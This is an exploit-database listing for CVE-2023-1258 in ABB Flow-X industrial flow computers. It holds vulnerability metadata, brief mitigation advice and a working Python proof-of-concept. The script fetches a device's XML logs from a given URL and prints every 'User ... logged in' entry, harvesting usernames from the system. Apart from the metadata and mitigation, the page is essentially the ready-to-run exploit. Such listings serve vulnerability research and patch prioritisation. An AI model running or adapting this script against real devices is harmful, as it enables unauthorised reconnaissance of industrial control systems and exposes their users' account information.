header-logo
Suggest Exploit
vendor:
ABB FlowX
by:
Paul Smith
5.5
CVSS
MEDIUM
Exposure of Sensitive Information
200
CWE
Product Name: ABB FlowX
Affected Version From: ABB Flow-X all versions before V4.00
Affected Version To: V4.00
Patch Exists: YES
Related CWE: CVE-2023-1258
CPE: ABB Flow-X
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

ABB FlowX v4.00 – Exposure of Sensitive Information

This exploit allows an attacker to expose sensitive information in ABB FlowX v4.00. By sending a specific request, the attacker can retrieve user login information from the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update ABB FlowX to version 4.00 or later. Additionally, access to the system should be restricted to authorized personnel only.
Source

Exploit-DB raw data:

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
    	print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
    	exit()

    # Decode the xml response into dictionary and use the data
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
    	test = re.search('User (.*?) logged in',str(log))
    	if test:
    		print(test.group(0))
def main():
	dump_users()


if __name__ == '__main__':
  	main()